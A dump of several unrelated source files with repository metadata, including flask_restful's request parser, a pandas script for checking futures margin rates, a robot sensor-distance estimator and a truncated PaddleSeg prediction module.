image_applatie = donnees_ent_X[i]
une_image = image_applatie.reshape(28, 28)
plt.imshow(une_image, cmap = mpl.cm.binary, interpolation="nearest")
plt.axis("off")
plt.show() | [
"godin.robert@uqam.ca"
] | godin.robert@uqam.ca |
b67f54c5743329b00db5cb95eb989785b1753334 | bfd196c62c8a4f0fa313960de3fcebff16491968 | /__init__.py | 983e326389960710d3a4748532a98881362d80cd | [] | no_license | humanytek-team/acc_customer_destiny_location | c8ba702f9f834c070afc5f1da57c71aea9a55aed | 6b4e795d7255f05197f924cc883e1aadbcc668d6 | refs/heads/master | 2021-05-07T21:28:17.701505 | 2017-10-31T15:16:35 | 2017-10-31T15:16:35 | 109,013,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | #import sale_order
import account_invoice
import client_warehouse | [
"s.mtz.casillas@gmail.com"
] | s.mtz.casillas@gmail.com |
f849478cc7761ac222d66b2215c09ce091a114d9 | 6a0a634265957e9dcd26bc80e3304e107fb004d0 | /venvflask/lib/python3.7/site-packages/flask_restful/reqparse.py | 7c33f143a5e14cbfd098613fad892829efa31f54 | [] | no_license | ogutiann/PythonEthereumSmartContracts | 8bd81aa14eab567d41b5dad74b67aba92a405ebd | d870e9fd1c7f68b8493db4c2b2af224f966d8e51 | refs/heads/master | 2023-01-04T14:23:12.396898 | 2020-10-29T12:12:46 | 2020-10-29T12:12:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,660 | py | from copy import deepcopy
try:
from collections.abc import MutableSequence
except ImportError:
from collections import MutableSequence
from flask import current_app, request
from werkzeug.datastructures import MultiDict, FileStorage
from werkzeug import exceptions
import flask_restful
import decimal
import six
class Namespace(dict):
    """A ``dict`` subclass whose keys are also reachable as attributes.

    ``ns.foo`` reads ``ns['foo']`` (raising :class:`AttributeError` for a
    missing key, as the attribute protocol requires), and ``ns.foo = x``
    stores ``ns['foo'] = x``.
    """

    def __getattr__(self, name):
        # Fall back to item lookup; translate a missing key into the
        # AttributeError that attribute access is expected to raise.
        if name in self:
            return self[name]
        raise AttributeError(name)

    def __setattr__(self, name, value):
        # Every attribute assignment is stored as a dict item.
        self[name] = value
# Human-readable descriptions of request locations, interpolated into the
# "Missing required parameter in ..." message produced by Argument.parse().
_friendly_location = {
    u'json': u'the JSON body',
    u'form': u'the post body',
    u'args': u'the query string',
    u'values': u'the post body or the query string',
    u'headers': u'the HTTP headers',
    u'cookies': u'the request\'s cookies',
    u'files': u'an uploaded file',
}

# Default argument converter: coerce the raw value to unicode text.
# NOTE(review): deliberately kept as a one-argument lambda rather than
# ``six.text_type`` itself — presumably so that Argument.convert()'s calls
# with extra arguments fail with TypeError (triggering its fallback chain)
# instead of being misinterpreted as ``str(bytes, encoding)``; confirm
# before simplifying.
text_type = lambda x: six.text_type(x)
class Argument(object):
"""
:param name: Either a name or a list of option strings, e.g. foo or
-f, --foo.
:param default: The value produced if the argument is absent from the
request.
:param dest: The name of the attribute to be added to the object
returned by :meth:`~reqparse.RequestParser.parse_args()`.
:param bool required: Whether or not the argument may be omitted (optionals
only).
:param action: The basic type of action to be taken when this argument
is encountered in the request. Valid options are "store" and "append".
:param ignore: Whether to ignore cases where the argument fails type
conversion
:param type: The type to which the request argument should be
converted. If a type raises an exception, the message in the
error will be returned in the response. Defaults to :class:`unicode`
in python2 and :class:`str` in python3.
:param location: The attributes of the :class:`flask.Request` object
to source the arguments from (ex: headers, args, etc.), can be an
iterator. The last item listed takes precedence in the result set.
:param choices: A container of the allowable values for the argument.
:param help: A brief description of the argument, returned in the
response when the argument is invalid. May optionally contain
an "{error_msg}" interpolation token, which will be replaced with
the text of the error raised by the type converter.
:param bool case_sensitive: Whether argument values in the request are
case sensitive or not (this will convert all values to lowercase)
:param bool store_missing: Whether the arguments default value should
be stored if the argument is missing from the request.
:param bool trim: If enabled, trims whitespace around the argument.
:param bool nullable: If enabled, allows null value in argument.
"""
    def __init__(self, name, default=None, dest=None, required=False,
                 ignore=False, type=text_type, location=('json', 'values',),
                 choices=(), action='store', help=None, operators=('=',),
                 case_sensitive=True, store_missing=True, trim=False,
                 nullable=True):
        """Record the argument's configuration.

        All parameters are documented in the class docstring above.  No
        validation or normalization happens here; the values are consumed
        later by :meth:`source`, :meth:`convert` and :meth:`parse`.
        """
        self.name = name
        self.default = default
        self.dest = dest
        self.required = required
        self.ignore = ignore
        self.location = location
        self.type = type
        self.choices = choices
        self.action = action
        self.help = help
        self.case_sensitive = case_sensitive
        self.operators = operators
        self.store_missing = store_missing
        self.trim = trim
        self.nullable = nullable
def __str__(self):
if len(self.choices) > 5:
choices = self.choices[0:3]
choices.append('...')
choices.append(self.choices[-1])
else:
choices = self.choices
return 'Name: {0}, type: {1}, choices: {2}'.format(self.name, self.type, choices)
    def __repr__(self):
        # Mirror the constructor signature so the repr reads like the call
        # that configured this argument.  Values are interpolated with
        # str(), so the result is informational, not guaranteed eval()-able.
        return "{0}('{1}', default={2}, dest={3}, required={4}, ignore={5}, location={6}, " \
               "type=\"{7}\", choices={8}, action='{9}', help={10}, case_sensitive={11}, " \
               "operators={12}, store_missing={13}, trim={14}, nullable={15})".format(
                self.__class__.__name__, self.name, self.default, self.dest, self.required, self.ignore, self.location,
                self.type, self.choices, self.action, self.help, self.case_sensitive,
                self.operators, self.store_missing, self.trim, self.nullable)
def source(self, request):
"""Pulls values off the request in the provided location
:param request: The flask request object to parse arguments from
"""
if isinstance(self.location, six.string_types):
value = getattr(request, self.location, MultiDict())
if callable(value):
value = value()
if value is not None:
return value
else:
values = MultiDict()
for l in self.location:
value = getattr(request, l, None)
if callable(value):
value = value()
if value is not None:
values.update(value)
return values
return MultiDict()
    def convert(self, value, op):
        """Coerce a raw request value through ``self.type``.

        :param value: the raw value pulled from the request
        :param op: the operator string this value was matched under
        :raises ValueError: if ``value`` is None and the argument is not
            nullable
        """
        # Don't cast None
        if value is None:
            if self.nullable:
                return None
            else:
                raise ValueError('Must not be null!')

        # and check if we're expecting a filestorage and haven't overridden `type`
        # (required because the below instantiation isn't valid for FileStorage)
        elif isinstance(value, FileStorage) and self.type == FileStorage:
            return value

        # Converters may accept (value, name, op), (value, name) or just
        # (value) — try the richest signature first and retry with fewer
        # arguments on TypeError.
        # NOTE(review): a TypeError raised *inside* a converter is
        # indistinguishable here from an arity mismatch, so it silently
        # triggers a retry with fewer arguments.
        try:
            return self.type(value, self.name, op)
        except TypeError:
            try:
                if self.type is decimal.Decimal:
                    # Build Decimal from the string form to avoid binary
                    # float artifacts (e.g. Decimal(0.1)).
                    return self.type(str(value))
                else:
                    return self.type(value, self.name)
            except TypeError:
                return self.type(value)
def handle_validation_error(self, error, bundle_errors):
"""Called when an error is raised while parsing. Aborts the request
with a 400 status and an error message
:param error: the error that was raised
:param bundle_errors: do not abort when first error occurs, return a
dict with the name of the argument and the error message to be
bundled
"""
error_str = six.text_type(error)
error_msg = self.help.format(error_msg=error_str) if self.help else error_str
msg = {self.name: error_msg}
if current_app.config.get("BUNDLE_ERRORS", False) or bundle_errors:
return error, msg
flask_restful.abort(400, message=msg)
def parse(self, request, bundle_errors=False):
"""Parses argument value(s) from the request, converting according to
the argument's type.
:param request: The flask request object to parse arguments from
:param bundle_errors: Do not abort when first error occurs, return a
dict with the name of the argument and the error message to be
bundled
"""
source = self.source(request)
results = []
# Sentinels
_not_found = False
_found = True
for operator in self.operators:
name = self.name + operator.replace("=", "", 1)
if name in source:
# Account for MultiDict and regular dict
if hasattr(source, "getlist"):
values = source.getlist(name)
else:
values = source.get(name)
if not (isinstance(values, MutableSequence) and self.action == 'append'):
values = [values]
for value in values:
if hasattr(value, "strip") and self.trim:
value = value.strip()
if hasattr(value, "lower") and not self.case_sensitive:
value = value.lower()
if hasattr(self.choices, "__iter__"):
self.choices = [choice.lower()
for choice in self.choices]
try:
value = self.convert(value, operator)
except Exception as error:
if self.ignore:
continue
return self.handle_validation_error(error, bundle_errors)
if self.choices and value not in self.choices:
if current_app.config.get("BUNDLE_ERRORS", False) or bundle_errors:
return self.handle_validation_error(
ValueError(u"{0} is not a valid choice".format(
value)), bundle_errors)
self.handle_validation_error(
ValueError(u"{0} is not a valid choice".format(
value)), bundle_errors)
if name in request.unparsed_arguments:
request.unparsed_arguments.pop(name)
results.append(value)
if not results and self.required:
if isinstance(self.location, six.string_types):
error_msg = u"Missing required parameter in {0}".format(
_friendly_location.get(self.location, self.location)
)
else:
friendly_locations = [_friendly_location.get(loc, loc)
for loc in self.location]
error_msg = u"Missing required parameter in {0}".format(
' or '.join(friendly_locations)
)
if current_app.config.get("BUNDLE_ERRORS", False) or bundle_errors:
return self.handle_validation_error(ValueError(error_msg), bundle_errors)
self.handle_validation_error(ValueError(error_msg), bundle_errors)
if not results:
if callable(self.default):
return self.default(), _not_found
else:
return self.default, _not_found
if self.action == 'append':
return results, _found
if self.action == 'store' or len(results) == 1:
return results[0], _found
return results, _found
class RequestParser(object):
"""Enables adding and parsing of multiple arguments in the context of a
single request. Ex::
from flask_restful import reqparse
parser = reqparse.RequestParser()
parser.add_argument('foo')
parser.add_argument('int_bar', type=int)
args = parser.parse_args()
:param bool trim: If enabled, trims whitespace on all arguments in this
parser
:param bool bundle_errors: If enabled, do not abort when first error occurs,
return a dict with the name of the argument and the error message to be
bundled and return all validation errors
"""
def __init__(self, argument_class=Argument, namespace_class=Namespace,
trim=False, bundle_errors=False):
self.args = []
self.argument_class = argument_class
self.namespace_class = namespace_class
self.trim = trim
self.bundle_errors = bundle_errors
def add_argument(self, *args, **kwargs):
"""Adds an argument to be parsed.
Accepts either a single instance of Argument or arguments to be passed
into :class:`Argument`'s constructor.
See :class:`Argument`'s constructor for documentation on the
available options.
"""
if len(args) == 1 and isinstance(args[0], self.argument_class):
self.args.append(args[0])
else:
self.args.append(self.argument_class(*args, **kwargs))
# Do not know what other argument classes are out there
if self.trim and self.argument_class is Argument:
# enable trim for appended element
self.args[-1].trim = kwargs.get('trim', self.trim)
return self
def parse_args(self, req=None, strict=False, http_error_code=400):
"""Parse all arguments from the provided request and return the results
as a Namespace
:param req: Can be used to overwrite request from Flask
:param strict: if req includes args not in parser, throw 400 BadRequest exception
:param http_error_code: use custom error code for `flask_restful.abort()`
"""
if req is None:
req = request
namespace = self.namespace_class()
# A record of arguments not yet parsed; as each is found
# among self.args, it will be popped out
req.unparsed_arguments = dict(self.argument_class('').source(req)) if strict else {}
errors = {}
for arg in self.args:
value, found = arg.parse(req, self.bundle_errors)
if isinstance(value, ValueError):
errors.update(found)
found = None
if found or arg.store_missing:
namespace[arg.dest or arg.name] = value
if errors:
flask_restful.abort(http_error_code, message=errors)
if strict and req.unparsed_arguments:
raise exceptions.BadRequest('Unknown arguments: %s'
% ', '.join(req.unparsed_arguments.keys()))
return namespace
def copy(self):
""" Creates a copy of this RequestParser with the same set of arguments """
parser_copy = self.__class__(self.argument_class, self.namespace_class)
parser_copy.args = deepcopy(self.args)
parser_copy.trim = self.trim
parser_copy.bundle_errors = self.bundle_errors
return parser_copy
def replace_argument(self, name, *args, **kwargs):
""" Replace the argument matching the given name with a new version. """
new_arg = self.argument_class(name, *args, **kwargs)
for index, arg in enumerate(self.args[:]):
if new_arg.name == arg.name:
del self.args[index]
self.args.append(new_arg)
break
return self
def remove_argument(self, name):
""" Remove the argument matching the given name. """
for index, arg in enumerate(self.args[:]):
if name == arg.name:
del self.args[index]
break
return self
| [
"sijoythomas@pop-os.localdomain"
] | sijoythomas@pop-os.localdomain |
01b5aecd596babb4e4816989358f0c5c258c76bc | b9cea24e5fedb4d04cecc7d77932ae995e57af53 | /controlstatements/oddnumbers.py | 23f926553866fe74897e7c0e06d6ae6eccc48b50 | [] | no_license | bharaththippireddy/pythoncoreandadvanced | 70e8d4d43a31800f4e14e40fa53d8bc841866eb0 | 53bfb1d5a14fdc0aed882e486901b7b9a0f97780 | refs/heads/master | 2022-11-24T13:11:48.856569 | 2020-07-27T03:15:05 | 2020-07-27T03:15:05 | 282,782,741 | 1 | 7 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | x=int(input("Enter min number"))
y=int(input("Enter max number"))
i=x
if i % 2 == 0: i=x+1
while i<=y:
print(i)
i+=2
| [
"bharath@gmail.com"
] | bharath@gmail.com |
8816a5c657f444bdb5291cd1a2120ad77866f43f | 730ba345908910d835dfba40956cedf90d031923 | /data_compare_csv.py | ca7c3d3107cd73544a556ad4f56813e9ab2cec4f | [] | no_license | PatrickGPAN/script | a34a4bfcbb4704b41b7ee442f820f632637f472b | 1309888804b1ff5ac1d7dfa9b98af6ee6b01572c | refs/heads/master | 2020-03-28T14:13:57.573102 | 2018-09-26T01:43:13 | 2018-09-26T01:43:13 | 148,469,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,903 | py | ## _*_ coding:UTF-8 _*_
import pandas as pd
import numpy as np
date = raw_input("Please input the Date (Format: eg. 2017-08-30):")
cusid = raw_input("Please input the customer ID with the company standard:")
#sc=float(raw_input("Please input the collateral rate for SC (Format: eg. 0.07):"))
ssbzj=pd.read_csv("ssbzj.csv",encoding='gbk')
khxx=pd.read_csv("khxx.csv",encoding='gbk')
bzjmb=pd.read_csv("bzjmb.csv",encoding='gbk')
customer=pd.read_csv(cusid+".csv",encoding='gbk')
exchange=pd.read_csv(ur"ref\指定交易日交易所保证金率查询_"+date+".csv",encoding='utf-8')
exchange[u'合约']=map(lambda x: x.upper(),exchange[u"合约"])
delta=pd.read_csv(ur"ref\投资者保证金率属性_"+date+".csv",encoding='utf-8')
delta[u'合约代码']=map(lambda x: x.upper(),delta[u"合约代码"])
standard=pd.read_csv(ur"ref\投资者保证金率_"+date+".csv",encoding='utf-8')
standard[u'合约']=map(lambda x: x.upper(),standard[u"合约"])
exchangesx=pd.read_csv(ur"ref\交易所保证金率属性_"+date+".csv",encoding='utf-8')
exchangesx[u'合约代码']=map(lambda x: x.upper(),exchangesx[u"合约代码"])
#核对交易所合约保证金
contract=[]
for index in ssbzj.index:
if ssbzj.loc[index][u'合约代码'] == ssbzj.loc[index][u'合约代码']:
contract.append(str(ssbzj.loc[index][u'品种编号'])+str(int(ssbzj.loc[index][u'合约代码'])))
else:
contract.append(ssbzj.loc[index][u'品种编号'])
contract1=pd.Series(contract)
ssbzj['contract'] = contract1.values
temp1=pd.merge(ssbzj,exchange,left_on='contract',right_on=u'合约')
for index in temp1.index:
a1 = temp1.loc[index][u'初始保证金']
a2 = temp1.loc[index][u'投机多头保证金率']
if a1 != a2:
if temp1.loc[index][u'投机套保'] != u'保值':
print u"请核对合约上手保证金 " + temp1.loc[index]['contract']
#核对交易所品种保证金
#exchange[u"合约"].replace(regex=True, inplace=True, to_replace=r'[0-9.*]', value=r'')
#exchange=exchange.loc[exchange.groupby(exchange[u'合约'])[u'投机多头保证金率'].idxmin()]
exchangesx1=exchangesx[exchangesx[u'保证金分段名称'].isin([u'上市月后含1个交易日',u'上市月后含3个周五后含1个交易日后1个交易日'])]
#exchange[u"品种保证金"] = (exchange.groupby([u'合约'])[u'投机多头保证金率'].transform(lambda x: x.value_counts().index[0]))
protemp1=pd.merge(ssbzj,exchangesx1,left_on='contract',right_on=u'合约代码')
#protemp1.to_csv("test1.csv",encoding="utf8")
for index in protemp1.index:
a1 = protemp1.loc[index][u'初始保证金']
a2 = protemp1.loc[index][u'投机多头保证金率']
a3 = protemp1.loc[index][u'保值多头保证金率']
if a1 != a2:
if protemp1.loc[index][u'投机套保'] != u'保值':
print u"请核对品种上手保证金 " + protemp1.loc[index]['contract']
else:
if a1 != a3:
print u"请核对品种上手保证金 " + protemp1.loc[index]['contract']
"""
a1float = np.asscalar(a1)
if a1 != a2:
if protemp1.loc[index][u'投机套保'] != u'保值':
if protemp1.loc[index][u'合约'] != "SC":
print u"请核对品种上手保证金 " + protemp1.loc[index][u'合约']
elif abs(a1float-sc) > 1e-9:
print u"请核对品种上手保证金 SC"
"""
#核对保证金模板
bzjmb['contractproduct']=bzjmb[u'模板编号']+bzjmb[u'品种编号']
tempmb=pd.merge(bzjmb,khxx,left_on=u'模板编号',right_on=u'客户账号')
delta['contractproduct']=delta[u'投资者代码'].map(str)+delta[u'合约代码']
tempmb1=pd.merge(tempmb,delta,on='contractproduct')
#tempmb1.to_csv("test1.csv",encoding="utf8")
for index in tempmb1.index:
a1 = tempmb1.loc[index][u'初始保证金']
a2 = tempmb1.loc[index][u'投机多头保证金率']
if tempmb1.loc[index][u'账号状态'] == u'正常':
if a1 != a2:
print u"请核对保证金模板 " + tempmb1.loc[index][u'模板编号'] + " " + tempmb1.loc[index][u'品种编号']
#核对公司标准客户最终费率
contractzz=[]
for index in customer.index:
if customer.loc[index][u'合约'] == customer.loc[index][u'合约']:
contractzz.append(str(customer.loc[index][u'品种编号'])+str(int(customer.loc[index][u'合约'])))
else:
contractzz.append(customer.loc[index][u'品种编号'])
contractzz1=pd.Series(contractzz)
customer['contractzz'] = contractzz1.values
temp1=pd.merge(customer,standard,left_on='contractzz',right_on=u'合约')
for index in temp1.index:
a1 = temp1.loc[index][u'买投机初始保证金']
a2 = temp1.loc[index][u'投机多头保证金率']
if temp1.loc[index][u'品种类型'] == u"期货":
if a1 != a2:
print u"请核对最终费率 " + cusid + " " + temp1.loc[index]['contractzz']
raw_input("ALL COMPLETED")
| [
"noreply@github.com"
] | PatrickGPAN.noreply@github.com |
6977ac4f0421d56cf759e4eea724446355eb70f6 | ca019b667f762f19ee0ff78dbe1a65f52b01c2e9 | /a_priori_sensor_estimate.py | 88347c2d7915844a378be7eb5e2aeeb6ca378d8a | [] | no_license | mayurbhandary/EE183DA-Lab3 | f9369c5a7bbb4f8381f8763cdb958e4c649e1835 | d01e0134cda447e2dddc6634e8dbeb62d655fa08 | refs/heads/master | 2021-04-03T06:59:13.550785 | 2018-03-14T04:13:45 | 2018-03-14T04:13:45 | 125,125,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,818 | py | #script for testing a priori sensor estimation
import numpy as np
import math as math
BOX_WIDTH = 60
BOX_LENGTH = 100
def apriori_sensor_estimate(state_apriori):
#apriori state values
x_apriori = state_apriori[0]
y_apriori = state_apriori[1]
xy_apriori = [x_apriori, y_apriori]
theta_apriori = state_apriori[2]
#want to determine this value
front_sensor_distance = 0
right_sensor_distance = 0
#special cases: theta_apriori = 0, 90, 180, or 270 deg
if theta_apriori == 0:
front_sensor_distance = BOX_LENGTH - x_apriori
right_sensor_distance = y_apriori
return front_sensor_distance , right_sensor_distance
if theta_apriori == math.pi/2:
front_sensor_distance = BOX_WIDTH - y_apriori
right_sensor_distance = y_apriori
return front_sensor_distance , right_sensor_distance
if theta_apriori == math.pi:
front_sensor_distance = x_apriori
right_sensor_distance = y_apriori
return front_sensor_distance , right_sensor_distance
if theta_apriori == 3/2*math.pi:
front_sensor_distance = y_apriori
right_sensor_distance = y_apriori
return front_sensor_distance , right_sensor_distance
#slopes
m1 = math.tan(theta_apriori)
m2 = -1/m1
#direction vectors
direction_vector_front = [math.cos(theta_apriori), math.sin(theta_apriori)]
direction_vector_right = [math.sin(theta_apriori), -math.cos(theta_apriori)]
#boundary intersections
x_leftwall = 0
y_leftwall_front = get_y_value(x_apriori, y_apriori, x_leftwall, m1)
leftwall_intersection_front = [x_leftwall, y_leftwall_front]
y_leftwall_right = get_y_value(x_apriori, y_apriori, x_leftwall, m2)
leftwall_intersection_right = [x_leftwall, y_leftwall_right]
x_rightwall = BOX_LENGTH
y_rightwall_front = get_y_value(x_apriori, y_apriori, x_rightwall, m1)
rightwall_intersection_front = [x_rightwall, y_rightwall_front]
y_rightwall_right = get_y_value(x_apriori, y_apriori, x_rightwall, m2)
rightwall_intersection_right = [x_rightwall, y_rightwall_right]
y_bottomwall = 0
x_bottomwall_front = get_x_value(x_apriori, y_apriori, y_bottomwall, m1)
bottomwall_intersection_front = [x_bottomwall_front, y_bottomwall]
x_bottomwall_right = get_x_value(x_apriori, y_apriori, y_bottomwall, m2)
bottomwall_intersection_right = [x_bottomwall_right, y_bottomwall]
y_topwall = BOX_WIDTH
x_topwall_front = get_x_value(x_apriori, y_apriori, y_topwall, m1)
topwall_intersection_front = [x_topwall_front, y_topwall]
x_topwall_right = get_x_value(x_apriori, y_apriori, y_topwall, m2)
topwall_intersection_right = [x_topwall_right, y_topwall]
#boundary vectors
leftwall_vector_front = list(np.array(leftwall_intersection_front) - np.array(xy_apriori))
rightwall_vector_front = list(np.array(rightwall_intersection_front) - np.array(xy_apriori))
bottomwall_vector_front = list(np.array(bottomwall_intersection_front) - np.array(xy_apriori))
topwall_vector_front = list(np.array(topwall_intersection_front) - np.array(xy_apriori))
leftwall_vector_right = list(np.array(leftwall_intersection_right) - np.array(xy_apriori))
rightwall_vector_right = list(np.array(rightwall_intersection_right) - np.array(xy_apriori))
bottomwall_vector_right = list(np.array(bottomwall_intersection_right) - np.array(xy_apriori))
topwall_vector_right = list(np.array(topwall_intersection_right) - np.array(xy_apriori))
#vector dot products
leftwall_dotproduct_front = np.dot(direction_vector_front, leftwall_vector_front)
rightwall_dotproduct_front = np.dot(direction_vector_front, rightwall_vector_front)
bottomwall_dotproduct_front = np.dot(direction_vector_front, bottomwall_vector_front)
topwall_dotproduct_front = np.dot(direction_vector_front, topwall_vector_front)
dot_products_front = [leftwall_dotproduct_front, rightwall_dotproduct_front, bottomwall_dotproduct_front, topwall_dotproduct_front]
leftwall_dotproduct_right = np.dot(direction_vector_right, leftwall_vector_right)
rightwall_dotproduct_right = np.dot(direction_vector_right, rightwall_vector_right)
bottomwall_dotproduct_right = np.dot(direction_vector_right, bottomwall_vector_right)
topwall_dotproduct_right = np.dot(direction_vector_right, topwall_vector_right)
dot_products_right = [leftwall_dotproduct_right, rightwall_dotproduct_right, bottomwall_dotproduct_right, topwall_dotproduct_right]
#distances between apriori (x,y) and boundary intersections
leftwall_distance_front = dist(xy_apriori, leftwall_intersection_front)
rightwall_distance_front = dist(xy_apriori, rightwall_intersection_front)
bottomwall_distance_front = dist(xy_apriori, bottomwall_intersection_front)
topwall_distance_front = dist(xy_apriori, topwall_intersection_front)
leftwall_distance_right = dist(xy_apriori, leftwall_intersection_right)
rightwall_distance_right = dist(xy_apriori, rightwall_intersection_right)
bottomwall_distance_right = dist(xy_apriori, bottomwall_intersection_right)
topwall_distance_right = dist(xy_apriori, topwall_intersection_right)
#determine which wall front sensor is pointing at
positive_dot_products_front = []
for i in range(len(dot_products_front)):
if dot_products_front[i] > 0: #store the positive dot products
positive_dot_products_front.append(dot_products_front[i])
print "positive dot products for front sensor: ",positive_dot_products_front
print " "
#left wall dot product check
if dot_products_front[0] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[0] is the smallest dot product
for i in range(len(positive_dot_products_front)):
if dot_products_front[0] > positive_dot_products_front[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter left"
front_sensor_distance = leftwall_distance_front;
#right wall dot product check
if dot_products_front[1] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[1] is the smallest dot product
for i in range(len(positive_dot_products_front)):
if dot_products_front[1] > positive_dot_products_front[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter right"
front_sensor_distance = rightwall_distance_front;
#bottom wall dot product check
if dot_products_front[2] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[2] is the smallest dot product
for i in range(len(positive_dot_products_front)):
if dot_products_front[2] > positive_dot_products_front[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter bottom"
front_sensor_distance = bottomwall_distance_front;
#top wall dot product check
if dot_products_front[3] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[3] is the smallest dot product
for i in range(len(positive_dot_products_front)):
if dot_products_front[3] > positive_dot_products_front[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter top"
front_sensor_distance = topwall_distance_front;
#determine which wall right sensor is pointing at
positive_dot_products_right = []
for i in range(len(dot_products_right)):
if dot_products_right[i] > 0: #store the positive dot products
positive_dot_products_right.append(dot_products_right[i])
print "positive dot products for right sensor: ",positive_dot_products_front
print " "
#left wall dot product check
if dot_products_right[0] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[0] is the smallest dot product
for i in range(len(positive_dot_products_right)):
if dot_products_right[0] > positive_dot_products_right[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter left"
right_sensor_distance = leftwall_distance_right;
#right wall dot product check
if dot_products_right[1] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[1] is the smallest dot product
for i in range(len(positive_dot_products_right)):
if dot_products_right[1] > positive_dot_products_right[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter right"
right_sensor_distance = rightwall_distance_right;
#bottom wall dot product check
if dot_products_right[2] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[2] is the smallest dot product
for i in range(len(positive_dot_products_right)):
if dot_products_right[2] > positive_dot_products_right[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter bottom"
right_sensor_distance = bottomwall_distance_right;
#top wall dot product check
if dot_products_right[3] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[3] is the smallest dot product
for i in range(len(positive_dot_products_right)):
if dot_products_right[3] > positive_dot_products_right[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter top"
right_sensor_distance = topwall_distance_right;
#print wall intersection distances
print " "
print "left wall distance front sensor: ", leftwall_distance_front
print "right wall distance front sensor: ", rightwall_distance_front
print "bottom wall distance front sensor: ", bottomwall_distance_front
print "top wall distance front sensor: ", topwall_distance_front
print " "
print "left wall distance right sensor: ", leftwall_distance_right
print "right wall distance right sensor: ", rightwall_distance_right
print "bottom wall distance right sensor: ", bottomwall_distance_right
print "top wall distance right sensor: ", topwall_distance_right
#print wall dot products
print " "
print "left wall dot product front sensor: ", leftwall_dotproduct_front
print "right wall dot product front sensor: ", rightwall_dotproduct_front
print "bottom wall dot product front: ", bottomwall_dotproduct_front
print "top wall dot product front: ", topwall_dotproduct_front
print " "
print "left wall dot product right sensor: ", leftwall_dotproduct_right
print "right wall dot product right sensor: ", rightwall_dotproduct_right
print "bottom wall dot product right: ", bottomwall_dotproduct_right
print "top wall dot product right: ", topwall_dotproduct_right
print " "
return front_sensor_distance, right_sensor_distance
def get_y_value(x_apriori, y_apriori, x ,slope):
return slope*(x - x_apriori) + y_apriori
def get_x_value(x_apriori, y_apriori, y, slope):
return ((y - y_apriori) / slope) + x_apriori
def dist(p1,p2):
return math.sqrt((p1[0]-p2[0])*(p1[0]-p2[0])+(p1[1]-p2[1])*(p1[1]-p2[1]))
if __name__ == "__main__":
x_apriori = input("A priori x: ")
y_apriori = input("A priori y: ")
theta_apriori = input("A priori theta (in radians): ")
print " "
state_apriori = [x_apriori, y_apriori, theta_apriori]
aprioriFrontSensorEstimate, aprioriRightSensorEstimate = apriori_sensor_estimate(state_apriori)
print "A priori front sensor estimate: ", aprioriFrontSensorEstimate
print "A priori right sensor estimate: ", aprioriRightSensorEstimate
| [
"noreply@github.com"
] | mayurbhandary.noreply@github.com |
990eab3bfb95f9e034dff652d4940d4049c150a5 | b8562dd67c855e1bebbd0ad093f6dbf4b920ddfa | /507proj/bin/wheel | 396c232db77b396f3939fbeef36d4fca767d750a | [] | no_license | zhr211/SI5017FinalProj-foodieflask | 022124048c4f273c086b9aa8e03f08548245f0b0 | 3011ebe498fc7bcb5b7560ebc409a6cb2da8d2d3 | refs/heads/master | 2020-04-11T01:35:36.177222 | 2018-12-12T02:16:42 | 2018-12-12T02:16:42 | 161,420,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | #!/Users/apple/Desktop/2018Fall/SI507-FALL/FinalProject/507proj/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"zhr@umich.edu"
] | zhr@umich.edu | |
1acf8a09959d28ad02255ba4048d644c5a097f57 | 8de34d7180ccfadd104c2fec7b2ef8ae441e9801 | /paddleseg/core/predict.py | 1f6af33cc47c987cd8e0998b780b2b12cb6efabf | [] | no_license | ymzx/bugs_track_detect_v2.2 | ebd30b14831e9c0a8e376917785a68fec6178886 | e5a75eb43dac980482b5a842f200c63f2f377010 | refs/heads/main | 2023-07-15T20:52:58.846034 | 2021-08-29T05:57:30 | 2021-08-29T05:57:30 | 399,048,489 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,385 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import math
import cv2
import numpy as np
import paddle
from paddleseg import utils
from paddleseg.core import infer
from paddleseg.utils import logger, progbar
from paddleseg.utils.FilepathFilenameFileext import filepath_filename_fileext
def mkdir(path):
sub_dir = os.path.dirname(path)
if not os.path.exists(sub_dir):
os.makedirs(sub_dir)
def partition_list(arr, m):
"""split the list 'arr' into m pieces"""
n = int(math.ceil(len(arr) / float(m)))
return [arr[i:i + n] for i in range(0, len(arr), n)]
def predict(model,
model_path,
transforms,
image_list,
image_dir=None,
save_dir='output',
aug_pred=False,
scales=1.0,
flip_horizontal=True,
flip_vertical=False,
is_slide=False,
stride=None,
crop_size=None):
"""
